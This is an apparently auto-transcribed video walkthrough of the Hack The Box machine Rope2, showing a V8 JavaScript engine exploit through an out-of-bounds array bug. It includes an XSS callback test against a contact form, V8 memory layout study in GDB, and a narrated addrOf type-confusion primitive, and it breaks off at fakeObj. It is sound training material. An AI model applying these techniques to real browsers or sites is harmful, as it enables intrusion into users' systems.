What's going on YouTube? This is Ipsec. I'm doing the first of 3 parts of Rope2, and that is the V8 browser exploit. I want to do the other 2, but I don't know when I'll have time for them because every part of this box takes an immense amount of preparation to do. I probably spent 2 or 3 days just making sure I got this video right. I had the first attempt of the video recorded a few days ago, but as I was trying to do the heap, I realized how bad this piece was and decided to start dedicating all the time to just do this one piece well. The other 2 pieces, a heap challenge and a kernel exploit challenge. So again, a lot more learning, but I didn't want to give people a bad foundation by saying things that were incorrect. And I started this video a while ago, but I had to move because I bought a new house, and due to COVID, we didn't want to hire movers, so I had to do all that myself, which took a lot of time. And then, unfortunately, my girlfriend's cat of like 13 years passed away because of cancer, so I lost a few more days where I just wasn't on the computer that much. So what we're left with is this video, and hopefully it's done well enough where you can understand how to exploit the Chrome browser with a AddrOf and FakeObject primitives. So with that being said, let's jump in. As always, we're going to start off with the nmap, so -sc for default scripts, SV enumerate versions, OA output all formats, put in the nmap directory and call it Rope2, and then the IP address, which is 10.10.10.196. Since I'm not the root user, I'm going to run this nmap with sudo, and nmap does take a while, so I've already ran it for us, so we don't have to wait. There are 3 ports open. There is SSH on port 22, and its banner tells us it's Ubuntu 10, which is relatively unique. If you look at other boxes, you'll see these banners. We'll get into this one in a little bit. We have HTTP on port 5000. It's running Nginx. Nmap found a robots.txt file with things like autocomplete users, search, API, admin, and then the HTTP title of this tells us it is GitLab. So if we didn't know it was GitLab, we take what's in this robots.txt file and run GoBusters against each of these entries to see if we can find any hidden endpoints. But we know it's GitLab already, so we won't really dig too much into that. Then we also have HTTP on port 8000, and it's running a Python web server called Workzug, or however you pronounce that. So let's just get into these websites. So I'm going to copy this IP address to my clipboard, and we're going to go to 10.10.10.196, port 5000, which is the GitLab. There's nothing really here, so I'm just going to move and check the other one, so 8000. And we can see a page that just says V8 Dev, and it's developing the JavaScript engine. If we click Learn More, it doesn't really go anywhere, so let's scroll down. It says, check out the source code here. We click this link. It goes to server not found because it's looking for gitlab.rope2.htb. So let's go add that to our host file. So sudo vi etc host, and we can say 10.10.10.196 and put that entry there. And I always add just the parent domain of rope2.htb. I don't think it's needed, but it's just habit whenever you have this, also add the other one. Come on, exit that. And now when I refresh this, we have a GitLab page of the V8 source code. And if we go to the commits, it's going to take a little bit to load. But once it's loaded, we can see R4J, the creator of this box, has the latest commit at added array GetLastElement and array setLastElement built-ins. All these other commits are just the standard devs from V8. So let's take a look at what R4J added to this project to see these 2 functions. And looking at this, the exploit is relatively straightforward. It's returning the array length, and this is actually 1 greater than it needs to be. So you'd want to put a -1 because right now the array length is too big. And if you wanted to return the very last element, it would be array length -1. Let's see. And this array set last element is the same thing, but allowing us to write right after the array. Let's see if we can make this make more sense, because I know that's probably not a good explanation. So let's search for arrays and V8 exploit and go to this blog post, because I think this one shows the picture of what this looks like. So array length, you'd expect it to be index 0, 1, 2, 3 of the 4 items in the array, but it's really going to be array length is going to be 5 here. So 1, 2, 3, 4, and then a 5th item. And you're going to get the pointer, the memory address, right after the elements, which is this map pointer, I believe. We'll compile V8 and go in depth in this, so hopefully it makes sense. But essentially, the last element, you're expecting to get index 3, or whatever the last index is, but you're getting what is after that, which is a map pointer, which tells the JavaScript engine what type of object is in this array. It's just a bunch of metadata. So that is an out-of-band read, and there is a out-of-band write with this array set last element. So we can read and write to this map pointer, which will allow us to get code execution. And again, if this doesn't make sense, hopefully it does by the end of this video. It didn't make sense to me at first, but thanks to like Minato, OXDF, and FizzBuzz, they've helped me kind of understand what's going on. So big shout outs to them. And yeah, but before we can actually exploit these, we have to figure out a way to make their browser make a request back to us. So if we go to this download thing, it's just going to be Chrome. We could download and go into it, but I'm not going to. There is a contact us link, and we can do messages like test and send. It just says sent. So let's try doing a cross-site scripting test. So we're going to do image source is equal to HTTP 10.10.14. My IP address is 4. I'm also going to start a web server up. So Python 3-m http.server. And we're on port 8000. Just make it get xss.test. Okay. So if someone browses to the contact us page in a browser, we're linking an image on our web server. If I click send, we go back and we see 10.10.10.196 hit us. The Python web server doesn't get us things like the headers. So I'm going to run a netcat on port 8000 and redo this request. I did Control-Shift-R, so it sent the whole payload again. And we see the get xss.test, but now we can see the user agent, which is just headless Chrome. So now we can make their web browser access our box. So we're getting somewhere. We could just download the Chrome and test it ourselves, but it's not good to debug a whole browser. If you want to find an exploit in V8, it's better just to grab V8 and then play with it. I'm not going to do it on Parrot because whenever I do like some type of exploitation, I try to make my environment as similar to the target as I can. So we're going to switch over to Ubuntu. Now, what version of Ubuntu do they use? This is where things like these banner headers come in handy. So we can just search for this, and let's go to Google and see what version of Ubuntu they use. I actually want to leave that link. Let's do this. Google, paste, and let's see. Does this ever tell us what Ubuntu 10 is? I'm looking for like a fingerprint. Let's see, JTSec. I'm going to add fingerprint to this and see if we get it. Completely mundane. Bunch of things. Come on, what is it? Nothing there. I'll say Ubuntu 10. See if we can figure out what this is. There should be an OS fingerprint somewhere. It's definitely not 10.04. Ubuntu 10. Let's go. Is there anything else we can do? 373 Python. No, I did with this. Let's do sh-v 10.10.10.196. And I want to get the actual header. So this is running Let's see. This is exactly what it told me. Let's grab this. Locate version string. Yeah, let's just grab this one. Ubuntu 10. Is this going to get it? Here we go. So let's see what package this is, if this tells us. And we also have SHOS identification. So this is telling us it is Disco, which is, I think, Ubuntu 19, which is not a long-term support distro. And if we look at this, here is the exact banner, Ubuntu 10, 1904. So Disco is actually end of life now. And being end of life makes it a pain to grab updates and stuff from apt. So I installed Ubuntu 1804. So in this case, I didn't replicate the environment exactly just because it's end of life. Even numbers are long-term support. Odd numbers are like bleeding edge, unstable. So these odd ones won't have a long lifespan. The even ones do. So I'm going to go over to my Ubuntu machine that I built for this, and we will begin downloading and compiling V8. And this process will probably take hours. The critical thing is to make sure you have at least 4 gigs of memory. If you do this with less than 4 gigs of memory, one of these steps is probably going to fail. So keep that in mind. Software update. Restart later. Hopefully that doesn't screw anything up. Open up Firefox. It's going to take its time to open. And we want to do Chromium Depot Tools to download this. Let's see, where is the source? I think this is it. So I'm going to do, let's go into Documents, get clone this. And then once we download Depot Tools, we export a path to add this into our path. So Depot Tools. So now everything in Depot Tools I have. So we can do fetch V8. And this is going to start downloading the V8 library. And then once we have this, we're going to go down to the version that is on the box. So, and this fetch V8 takes a long time. So while this happens, let's just upgrade our GDB. So I'm going to do GDB install Jeff. It's spelled G-E-F. And we're going to go here and do the thing you should probably never do and just blindly execute this install script. So copy this, paste, and this will now install Jeff. So when I do GDB, we have it. Okay, I did Control D there to exit. The other thing that's weird is Python's not there, but Python 3 is. So I'm going to go user bin and ln-s Python 3 6 to Python sudo. And now when I type Python, it's found. That's just needed because some applications don't assume Python version and say Python 3. They just say Python. So that helps that. And we still have this running. So yeah. And the fetch V8 command finished, but we have a bunch of error messages. So I don't think I was quick enough with the Python because we see this python.find, no Python found. And it's also looking for Python 2.7. So what I'm going to do is sudo apt install Python 2.7 to put this on our system. And then we're going to restart this fetch V8 command, and hopefully it works the second time. I don't know exactly what that vpython is. So yes, and let's delete everything in our documents directory. So ls la rm-rf cipd gclient gcl v8 .gcl. And once this deletes, we'll run fetch v8 again, and hopefully it works. So I'm going to run it and see if it works this time. So it's probably going to take 10 minutes for me, could take longer for you based upon internet and things like that. So we'll just resume the video once it's done. So after installing Python 2.7 and fixing the Python path to put Python as just Python, it works. So we can go into this cd v8 directory and do build install build deps.sh to install all these build dependencies. So once this finishes running, then we can do a git checkout to check out to the version that of v8 that we want. So pause the video again and let this run. Now that the build dependencies are done, we can do a git checkout and download the code that is closest to the place. I know that was descriptive. Let's see. I have to connect to the VPN. So let's do new terminal, home, sudo openvpn, HTTP, OVPN, and we'll close out on this guy. I know I'm going to forget to connect back to the VPN whenever we go back to pair it, which will probably be an hour from now or maybe longer. But connect to the VPN. And now I can download this. So go to /root, v8, commits, and we want to get the last build from the dev team. So I'm going to download this one. So git checkout that, I think. Yeah. And then once we do this, we want to run a sync command. And once that sync finishes, we can apply the patch. So let's go to this. And where is the diff? The plain diff. So we want to download this. So once this sync is finished, we will apply the diff. So gclient sync is finished. So let's download the diff that we had got from GitHub and do a git apply on it. And now we can finally begin compiling. But before I do, I want to check how much memory I have. And I only have 2 gigs of memory. And this next step is when you need 4 gigs of memory. So if you ever see like ninja subcommand failed, it's probably out of memory. It doesn't give good error messages. So let's see. Can I edit memory when it's live? Probably not. Go to settings, memory. It's only letting me do 3 gigs. Cancel. Oh God, what did I just do? If I shut this machine down or suspend it first, will it let me do more? Let's go up here. Settings. How much memory will you let me do? Memory. Yeah, I guess it's only like because it's running. So let me shut down this machine. And if it shows all my VMs in VMware Workstation, I'll just pause the video and set the memory. Sorry for that sloppy cut of speaking mid thing. It showed some information I didn't feel like putting in the video, but I'll click on this memory 2 gigs, and we're going to change it to 4096. and then boot this machine back up. Because, yeah, I don't know what device that is. It's probably the CD-ROM or something. So once Ubuntu boots up, we'll have to export our path again. Let's log in. And then open up a terminal. I'm going to guess right here. Way off. There's not even an icon for terminal. That's how far off I was. Let's see. We want to go into documents. That's where I have depot tools. So export path is equal to pwd depot tools path. Okay. So we wanted to go into V8. This is where we did the get apply. So we can do tools dev v8 gen.py x64.release. And if you thought the parts of this video took a while to do, you're in for a treat, because this is probably going to take what? Let's see, I did something wrong, because that should have taken a long time. Oh, wait. That was just building something. Ninja-C is what's going to take a while. Yeah. So these next two steps are going to take a while. You may want to assign more like processors or cores to your VM. I'm on, I think, one processor, 4 core. Probably should be up higher, but I don't like giving too much to these VMs. 2.2. Probably should be at 1.4, but oh well. That should be fine. Gonna pause the video because, again, this takes forever. And then the next one we got to do is debug, which takes even longer than release. So these next two steps will probably take 2 to 3 hours, I would guess. Maybe shorter, but definitely don't expect to be doing anything anytime soon on your machine. Now that release is done compiling, probably around an hour later, we can now do the debug one, which I believe does take even longer than release. So we'll do x64.debug here instead of release, and then we'll do ninja-c out.gn x64.debug. So this will probably take, I'm going to guess, an hour and a half, but it could take shorter or longer. We'll, I guess, find out in whenever this done's. Well, I should have ran a date after this because it finished quite a while ago, but I was busy doing other things. I don't know how long the debug actually took, but prepare it to take around an hour, I guess. So let's start tmux and then go into each directory. So x64 debug, and then rename this whole pane to debug, and then create a new pane for release. And we're going to go cd out gn x64.release. And name that. We're not going to touch release just yet, but it's nice to have it there. And we have to open up Firefox, and we're going to go to a few websites just so you have a bunch of good reading material. The very first thing I'm going to go is search for frac v8, I think OOB, this one. And then also this Faith article is really good. This is what we're going to spend most of the time going over. There's some things that are different that we'll go into in just a minute, but for the most part, I think that's great. And then there's an arrays in V8 article. This LTAM, the simple bugs with complex exploits. This is great because it gives a lot of visuals, I believe. Yeah, like how arrays are stored. So we have the map, the properties pointer, the elements, and things like that. So it's a great article to also read. So let's go over and start our instance. So we can do gdb./d8. And then we want to do a argument. So allow natives syntax. And what this is going to allow us to do, it gives us a few extra functions. So if I do a equals please sub, and then we debug print a, we get a bunch of information. If we exit out of this and then we just run it, let's see. And we do a equals please sub, and I am low on disk space. Hopefully that doesn't become an issue, but debug print a. Wait, I don't think we're supposed to. Oh, it saved the argument from last time. So let's exit GDB altogether and start it back up and run. It's starting. A equals please sub debug print a. And we don't have that function. So that allow native syntax gives us that. So run allow natives syntax. I don't know how to clear the screen and stuff once we're in D8 other than going to GDB, pressing Control L and doing continue. But to start this off, let's go over to the Faith article and see where he does. So prereq knowledge, building D8, we've done that. The patch, we went into the actual exploit. It's very similar, but there's a GetLastObject and a setLastObject that's going to get whatever is after the array. So that's probably what we want to dig into. The thing, let's see. I'm going to go and just look at the code real quick. Cd sudo openvpn, what is it? Sudo openvpn http. So 10.10.10.196. I think this is it. So we have array set last element and get last element, and the issue was it wasn't doing a array length -1. So it's grabbing whatever is at the very end of the array. And I believe this type of exploit works because arrays start at 0. So if we had an array, so a equals 0, 1, 2, we do a0, that's an actual value. We do a1, that is a value as well. So the array length is going to be 3. And what GetLastObject is essentially doing is saying like, hey, A3. And A3 doesn't exist because it started at 0. So this would be 0, 1, 2. And the length is kind of counting this as 1. So 1, 2, 3. It's just a bug where most people grew up thinking 0 is not a number, it's undefined, so you don't start there. But in some cases, at least in programming, 0 is a number. It's the very first start. So this isn't null. It is actually a number, and this counts. So 1, 2, 3. So I think that's where that bug kind of comes from. So or at least that's why array length is returning 3. Because if there's only one value here, if it was just a equals 0, and you did array length of a to get how many objects are in here, and it returned 0, you'd be like, what the hell? There's one object in here. So that is why I guess, explanation of why I think that is the case. So let's go here, break it down. There is a thing called pointer tagging and immediate small integer. And for some reason, it's SMI. They reversed it. SMI does a left shift. So when it stores some numbers, and it's going to, you'll see this when we do looking into the memory and array length, it's going to left shift everything by 1. So in binary, this is 128, 64, 32, 16, 8, 4, 2, 1. So the value 1 would be this in binary. We left shift that. I don't have my arrow keys. It turns into that. It just moves everything 1. If we had 3, then 3 suddenly becomes this, which is 6. So left SMI is just left shift of 1. he's going to create a few helper functions. So let's do this real quick. So v pwn.js, I should set paste this in, and let's kind of explain these. This is just creating our variables, nothing there. This is float to int. So I don't know why it's not. Before it was, let's see. I thought Vim would automatically do comments. Okay, never mind. So float to integer. And essentially, we give it a float value. Float values are pretty much like decimals. So example 2.2. And out is going to give us a unsigned integer. So that is that function. This is the reverse. So yank this, put, and this is integer to float. This is in, and this is out. And I think this is also called a bigint, I believe. I'm not sure. I'll get rid of that just in case it's not. There is one function I'm going to want in this because we don't think in big numbers. We think more in memory addresses. At least I do. So when I see a long string of like 10 digits, I'm not going to know where that is in memory. But if I just see it in hex format, it may make things a bit easier. So we're going to create another function called toHex. And we'll go in float ex 2.2 and out 0x something. And this is super easy. So function f2h value and 1, 2, 3, 4 return 0x plus f2i value dot to string 16. So that is our hex function. So it converts the float to an integer and then converts it to a string 16, which converts it into hex. Yeah. Before we continue, one thing is really bothering me. This is not hex because it has invalid characters. So we'll just put valid characters there. And let's go back over to the Faith article and see what he talks about next. So here's he saying I2F, so integer, it takes a big int and converts it into a float. And we can run this with --shell file.js. And I don't think he does the debug print thing. Oh no, he does right here. Okay, allow native syntax. So he's going into what a array looks like of floats. So let's do that. GDB. I'm going to change up his examples a little bit to hopefully have it make more sense. So just going to clear the screen. And then we can try a is equal to 1.1, 1.2, 1.1, 1.2. And then b is equal to an array of 1.1 and 1.1. And c is equal to 1.1, 1.2, 1.3. So we have 3 different addresses here, and that's going to be helpful in a minute. V notes. So let's do debug print on A. And we're going to grab the top half. So grab this, paste, and then put an old line break, and we'll do a debug print on B next. Debug print B. Do the same thing. So grab this, Then put a line break. I'm going to grab C. Set debug print C. And grab this. And this isn't going to line up with Faith one for one because we have pointer compression, or pointer compression is different than his. And it changed in, I think, December of 2019. And even though his write-up is, I think, December of 2019, December of 2019, this challenge, I think, was a 2018 challenge. So the V8 engine changed a little bit how it stores things. The main thing is, his is storing, I think, in full addresses, and ours will be storing it in 32-bit addresses because of pointer compression. Let's see. So let's go to GDB. Whoops, not insert mode. Oh god, undo. I'm trying to get my tmux pane to resize. There we go. Okay. So let's go and examine this address. And every time we do something in GDB, we're going to have to -1, and that is to deal with pointer tagging. I believe it's said up here. Let's do pointer tagging. So this. If you read this section, it helps understand exactly why. But subtract 1 by everything, and this is going to give us a list of just a bunch of 64-bit addresses, and it's not going to line up exactly. If we're looking at A, we see 909, and it ends in 909 here, but this beginning, 0804, this begins in 14F9. So that doesn't match up. And what happened is, if you notice, everything begins with 0x14F9. So what pointer compression does is it chops this off and just stores it in, I believe, like the R13 register. And it does that because it calls this the isolate root. And it's like, I don't have to store this 500 times. I can just store this once, and then whenever we do a register, we just grab this. So this isolate root value isn't going to be here for most things. There is one thing it will be. It's the, we'll get into it later, but for all intents and purposes, we don't need this until the very end. So if we look, 080C7501. Oh wait, this. 08281909. 08281909. And the other address is right here, 080406E9, and that is going to be the map, E9. What is that? Thought that was going to be the map. So instead of doing telescope, I'm going to do x\16 hex wide, and that's going to divide it for us. There we go. So E9, where is E9? Oh shoot. I don't have my Vim keys on. Tmux set Vim, because Tmux defaults to, I think, Emacs. There are set mode keys. Mode V. Where is this? Come on. Tmux style. There we go. Set W G. Okay. So E9. Okay. Yeah, it is the properties right here. Being able to highlight text is such a handy thing. So I'm going to divide this pane again. So the memory address, we start out with 909, which is going to be map. Then we go to the property. So map property, and then D9. That should be the element right here. So map property, then element. And I'm splitting it like this because these are 64-bit addresses. So element, and what is after the element? 8. And please subscribe was 4 things. It was, I want to say 1.1, 1.2, 1.1, 1.2. So that's 8 things in this after SMI. So remember SMI, we do the left shift. So we have 4. So that's that. If we left shift this 1 bit, whoops, we have that, which is 8. 1, 2, 4, 8. So element, then length. And let's see. I think these are going to be values next. Oh no, we have to go to the element. So if we go and inspect the element of this, so x/16xw, we can either just copy this, or we know the element is this one, and we're going to have to put the isolate root on manually, which was 1 for F9. So we examine this, and we should be able to get the values. And I did 1.1, 1.2, 1.1, 1.2, so we can see them actually repeat. So let's see. I want to say this could be 1.1. Let's see, is there another 9,000? There isn't. So this is probably 1.1. This is probably 1.2. And we got 1.1 again, and then 1.2. So let's see. How can we convert this? Oh, we've got -1. Does that change anything though? Let's see. I think F199. Okay, so I'm going to copy this. Let's go big mode, copy, paste it. Oh, that did not paste well. Oh well. And let's clear the screen and continue into D8. And inside of D8, we want to grab 2 addresses. So we want to grab this. We're going to do integer to float, and grab this. And we put a n on the end to signify it's bigint. And oh, we need to add our helper variables in this. So I'm going to copy this, X out of everything, run it again, and we'll do --shell pwn.js to load that JavaScript file we created a few minutes ago. So now we have that, and we can do I2F this, and we get 1.1. So that was what a 1.1 looks like in memory. We can do the same thing with 1.2. So we can grab this, I2F, and the rest is all 3s. Like that. I2F 0x, copy, paste, and 1.2. So for this, we could have probably telescoped it. So if we telescope this address, what? Oh, because we restarted GDB. But all that would have done is showed it in, we'll just do it real quick. Let's continue. A is equal to 1.1, 1.2, 1.1, 1.2. B is equal to, what do we do? 1.1, 1.1. And C is equal to 1.1, 1.2, 1.3. So all these top ones are gone because all the memory addresses change. Why won't that delete? That pane is like frozen. That was weird. Okay. So we want to do debug print A, and we go to the very top, grab this address, go into the debugger, and x/16xw, the address -1. And we can get rid of these lines. So we have the map, the property, the element, the length. So this is the element. If we just telescoped this address, so 0x12c, which is the isolate root, this -1, get rid of that. You can see the float value. So 1.1, 1.2, 1.1, 1.2. So the compression's not really doing anything here. Us looking at it in 32-bit probably made it a bit more confusing, but that's the elements. So now let's look at B. So let's do debug print B, and we just take this and we'll x/16xw on this. And again, we have the map, the property, the element location, and then the length. The length is 4. Remember, we only have 2 things in this one. So that's what the binary looks like. We left shift this 1, and you have 4. That's 1, 2, 4. So the element is going to be here. So we do telescope and then 0x12c -1. This will show us all the addresses. And there's only 2 items in this, 1.1 twice, so that is 1.1. And if you don't believe me, I mean, we could do I2F and 1.1. So the last thing we had was a 3 items in the array, and I chose this one because it's going to have it's an odd number and it gets converted to an even because of the left shift. So let's do x/16xw. We could probably just do 4xw now since we don't need to see everything. We know that's the map, that's the property, that's the element address. Wait a second. I think I copied something wrong. Let's go back up to debug print C. I probably copied the map. Yeah, I copied something else. That is the map. So 4xw -1. So I knew it was the map because it ended at 909 and we've been dealing with it so much. But we got the map, the property, the element address, and the length. So again, we do a left shift. So we started with 3. So the 2 and the 1 is set. And then after the left shift, we move both of those left 1, and we're left with 6. So that is the immediate small integer SMI. The next thing we want to get into is probably going to be, I guess we can do objects real quick, and then we have to go over to release. So with objects, it's stored a little bit differently. And I don't know exactly how it's stored, but we'll know enough to be dangerous and get code execution. So O is equal to, there we go. Actually, let's do A is equal to please sub 1, B is equal to thank you 2, and C is equal to like this video 1. And this is going to be for my knowledge as well, because I don't know exactly what's going on here. I was trying to figure out how objects were stored in memory before this video, but didn't get to it. So let's do I should have done a debug print. We did ABO, I think. Where are objects? So we did ABC, and we can do O is equal to ABC. Okay. So A is equal to, this is going to be location. Let's just do debug print A. And the element is going to be the same for all of these. It's weird. I don't know exactly why that's the case. So debug print A, and I'm just going to say dash, and we'll put element there. Element and the property are the same. Element property. As you can see, those are the same exact values. And we can say map. Okay. So B, let's do debug print B. We have that map. The map is different for each of these, whereas if we went and did the integers, the map was the same for everyone, which is weird. But the element and the property, as you can see, is always the same. The only thing we really have to take into account for, I think, is the map. If we do, we won't even worry about C. C is there for later on. I wanted to put a value of 1 in something else. So let's do debug print O. And this map is map packed elements. And this is this is important to us. Instead of just wholly elements, we want to be packed. And the main reason is we want to be able to have we're eventually doing a type confusion. So if a variable is just straight an object, then when we convert a float array to be an object, it won't know what to do. If we put it as an array, it behaves a bit differently and does what we want. So hopefully that will make sense in just a minute. We also have back pointers, but I don't know exactly what I was going into here. The danger of doing things live. And this is the second time I recorded this whole thing, so you can imagine how bad the first one went. So if we look at O, it's here, map, and element. And here, the element and properties is not the same as well. Because I'm guessing, I don't know. I have no idea why things are what they are, but the key thing is objects is different. So let's go in GDB and inspect these. So x/16xw, we go to a -1, and we can see, let's see, f41, we got the map, we got the element, then, or the map and the property. We don't know if this is a property or element yet. They're the same. We can actually find out what it is by going to this object, because this one was not the same. So let's see, AD1. So element is still here. So this is the element, this is the property. And because this is now a float, there are 3 objects in it. So it's 6. Again, remember we did that before the left shift. This, you may think, is only because there's 1 object, but the value of this is 1. So if we go and look at this, which is the second one, xw -1, this was please sub :1. This was thank you :2. And darn it, let's do C debug print. The whole reason I created this variable is because I wanted to verify what I just said there was correct. So this should go back to 2. x/16xw -1. Yeah. So this is the value of it. And then this is pointing back to the element. And I'm guessing if we looked at this area, there's going to be pointers to the names of the variables, or the name of the variable is going to point here somehow. But we don't need to know that. So that is kind of how objects are stored in memory. Hopefully this is beneficial. I was iffy if I want to go into that object piece because I don't understand it. But let's go to the next thing. So where are we in this? So the map, this is essentially just how it's a bunch of metadata about what is being stored and how the application is going to handle it. The exploit we're going to do is, if you noticed in the element or in the object and float, things were handled differently. When the array, let's do VN, hopefully I do this right. When this array is a double, it's going to print the value. When this array is an object, it's going to store a pointer and it's going to get the value. So what this exploit is doing is we have this array that is a double, and we write a memory address here. And when we convert the array into an object, this memory address we wrote now becomes a pointer. And because it's a pointer, when we go and access it, it's going to get us the data where the pointer lives. And I think this is going to be FakeObject. So the second thing is we can have an array that is a double, and let's just say that's 1.1, and we're going to convert this array into an object. So we do some magic to convert this double into an object. And then we say array object is now equal to a variable. And what that's going to do is going to store the pointer of this variable here, because that's how objects work. It expects a pointer variable and it points to somewhere. So now that the pointer is here, variables pointer, we do some magic to convert the array back to a double. So when we do this magic to convert it back to a double, now the JavaScript engine is no longer going to follow where that pointer works. So when we access this variable, we get the location. And this is what AddrOf essentially is. And hopefully it makes more sense when I go into it again. We're covering it multiple times because it just took me a while to get my head wrapped around this. So it's just a bunch of type confusion type stuff. And that's what the map does. The map tells it what type of variable it is. Is it a float? Is it an array? Is it a wholly element? What is it? So that is what the float does. So I'm trying to debate if I want to take his code and then we go through and debug it, or we just write our own code, because some things are going to be slightly different because of how our exploit works, and we have more pointer compression. Let's copy his code and modify it and debug it, because I think that'd be more beneficial. So we have temp object. I want to rename these. So object array is going to be that, float array. Okay. So instead of this out of band, this is a different CTF challenge. And instead of set last element, get last element, it was OOB out of band. So we can say, whoops, get last element. Okay. Console log. And I'm going to call this FL_map, and this will be OBJ_map. And I'm going to say FL float map plus FL map. I think that's right. And we're going to call this one object map. Okay, let's see what this does. So we run this with pwn.js, and it crashed. Set the object map, run, crashed again. So we have something wrong. It's probably the GetLastElement piece, because that's the main piece we changed from his code. So let's see, float array. What if I'm calling GetLastElement wrong? Oh, we probably have to convert this. So float to hex. Nope. Let's see. Let's see if it's a console log that's failing. Oh, crap. So remember when I said we'd have to switch to a release eventually? Now is that time. Because the debug version actually has some type of memory checking in place to prevent out-of-band access, and when it happens, it crashes. And the reason it does that is to help fuzzers, because fuzzers like crashes. Like, you fuzz an application, you throw a bunch of data, and then you watch for the crashes, and those are the ones you mark. So if the application never crashes, then the fuzzer won't know an out-of-band access happened. I guess sometimes you may want to do out-of-band access, and that's why it doesn't crash on release, or maybe it's a performance thing. But yeah, that's why. So let's just save that. Okay, go here, and I'm going to copy this code, pwn.js to x64.release, and then we switch over to release. So gdb./d8, run. Did we not do what? bpwn.js? Oh, I guess it didn't save something. Run. Okay. So that's looking better. So let's see. Object map. We want to do f2h. So we can run this, and let's see. There was something I wanted to mention here. What was it? Let's do debug print fl map, debug print fl map. No, it's not fl map I want. What is this doing? We want to do fl array and object array and look at those. So let's run it again. And then we want to debug print fl array and debug print obj array. Copy both of these, and along with the float map and object map, because we want to make sure everything is accurate as to we understand it. So let's go into GDB, and we'll say x/8xw. We want to go to fl array -1. Fix our pane, and fl map has the float array has the map at 909, and that matches. And then we have the property, which we don't see here because we don't have the good debug print as the other one did, but have the property there, and then we have the element location. So let's take a look at the object array. And let's see. There is something wrong here. So the object array is the GetLastElement got us this value, whereas with the float array, it got us this value. So we want the object map to be this, not this. Not exactly sure what went on there, but we can see the differential is just 50. So if we just add 50 to the float map, we get the correct object map. We got that 721 here, and then 06E9. And again, the E9 is here, and then 909 is here. And that creates an issue because the property doesn't line up. If we just pushed this value with setLastElement, I believe it's going to set, instead of I believe, let's try it. Let's copy this. Let's see. I continue. And I think I can do obj array dot set last element, and then set it to obj_map. Let's see what happened. I honestly do not know, but I'm excited to find out. What? Oh, wrong thing. 8xw. So, I don't think it's set. That's the same exact thing. Let's see. What did I do? Obj array. So obj array set last element obj map. Oh, obj array set last element obj map. Then we debug print. I expected it to change something, but it didn't. Yeah, it's still exactly the same. So that did nothing. Maybe those functions only work with floats, but this object map is wrong. We want to, I'm actually going to leave that. And instead of where's object map, instead of this, because it was getting one offset off and I don't know exactly what was happening there. We want to just add 50. So var obj map is equal to, we want to convert this I to F, F to I. No, I should be able to just do FL map plus 0x50n. Get object map. I think that'll work. Bigint other type. So let's see. F to H. I don't think this is going to work because we returned a string. Yeah, that is definitely not it. Just looking at all those numbers, nothing lines up. So we have a float currently. And I thought we could have just done that. Maybe we just do 0x50. Run. Nope. So float to integer. So now we got a big int there. And then we can convert this entire thing back to a float. So I to F, like that. That should work. There we go. So object map and float map. I hope I save these notes. I did, sweet. Okay, so let's do debug print obj array, debug print obj array. We're going to grab this object map. And now we want to go in GDB and examine this memory. So x/8xw minus 1. Let's see what we have. E9. And 5.9. So I think we have it good. We have the 5.9 being here and E9 being here. So I think that's just endianness that is reversing it. But that looks better. Before the E9 was on this side, we wanted the E9 to be on this side. So hopefully that kind of makes sense why we did that. Okay, so the next thing we can do is the whole type confusion and getting the address of something. So let's see. What is it going to get the address of? Where is it? Okay, eventually the script gets the address of this. So that's what we're going to play with. Or we should be able to get the address of anything. So let's copy this. Set paste. So let's see. We're starting with the object, and we put it in index 0. Then we change the object into a float array. So set last element map 2, which will be FL map. And then we get the address by accessing index 0, and then we set it back to an object. FL map. Let's see if this works. I actually do not think it will. Obj map and obj good. I'm just looking at all the variable names. Looks fine. So AddrOf obj array. We probably should not get ourself. Temp obj. Let's just do var please sub is equal to 1. So AddrOf please sub. We crashed. I'm going to try doing it against an object real quick. Var please sub is equal to A1 AddrOf please sub. So his code crashes. Let's step through and do it manually. He starts out with the object. The very first thing here is he's starting with an object, and I think that's where the issue is. So let's create the array of 1.1, and then we want to convert the array. So if we do array 0, if we convert this into an object, so set last element obj map, and now if we do that, it's going to give us the memory address to where 1.1 lives. So if we do I2F, I think, I2FN, we probably have to sign it or something. But that should be where it lives. Or maybe, I don't know. It's been too long. So we created the array. We set the last element of that array to a object map. And now we want to place an object to leak. So var please sub is equal to a1. So we want to set array0 is equal to please sub. And now if we do array0, it's going to follow that because array right now is an object. So array0 has a pointer for an object, and as an object, it sees the map that is an object. So when you reference this, it's going to go, okay, well, I go from array0 to a pointer, that's an address to get a variable. However, if we convert this into a float and call it, now we have exactly where please sub lived. So if we do F2H on this number, this is where the variable please subscribe exists in memory. So this is when it's an object. And remember when we looked into the memory structure, floats did not have pointers. They just stored the value. So when it's a float, it goes ARR0, and pointer is really just a double, which is a float essentially. So it just gives pointer, and that goes to standard out, or whatever the thing is. So that's what that attack did. So we have to change it up a little bit because I think it's because of the compression that we can't just start with an object. So let's delete all this. And let's see. We want to create an array. So, oh my God. Stop fighting with me, Vim. Create array. So AR is equal to 1.1. And now we convert floating array to object array. So AR set last element obj map. And now we can place object to leak, then convert back to array. So we can do AR0 is equal to leak. And I like saying leak instead of an object better. Probably need I wonder if I should have semicolons at the end of everything or not. Everything's working without them, but JavaScript. So AR0, and then we can set the last element to be a map. And then we can grab the address, then reset back to normal. And we don't have to do that because we're creating a private variable here, and it should just go away when we exit this function. But if we were to clean up the code and optimize it, it's always good to put things back to how you left it, or how it was. So let address is equal to ARR0, and then array set last element back to object map. And then we need to return 32-bit address. So what we had here is the 64-bit, but we have to do pointer compression. So what we can do is we just do and 0x 12 12 12 12 n. Oh shoot. I was not in D8 or V8, whatever it is. all we want to do is chop some stuff off. Shell pwn.js f2, or this is I2f f2h. See what this is. So all we want to do was get rid of this. So that's why we did that and just zero it out. So we go here and we return float to integer, the address, and that. Okay, so now we have address of. So we should be able to play with this. So let's do var please subscribe is equal to a1, addr of please subscribe, and we get a int. So we can do f2h I2f, and that's the where please subscribe exists in the memory. We don't have the isolate root, which we will add, but address of works. Now, FakeObject this is a hard one to wrap your head around, or it was for me. So FakeObject is going to let us do some memory manipulation and create an object in memory that lets us read and write from other places. The memory manipulation part comes into play because we start off with like a fake array, and the fake array is going to have like the array map and then values. So the fake object, we point it back to say it starts at this exact memory location. And when JavaScript sees this, it's like, oh, this is a float array map. It's got that metadata, and then it's going to process how it is. And then we can just edit these values to be memory addresses and be able to go to addresses to write. So hopefully that will make sense as we do this coding. Oh, whoa. I did not mean to erase everything. V notes. Okay. So let's go v pwn.js. I need to go outgn x64 release v pwn.js. So with FakeObject, it's essentially the reverse of address of. So we're going to start off with an array, and that is going to be 1.1. 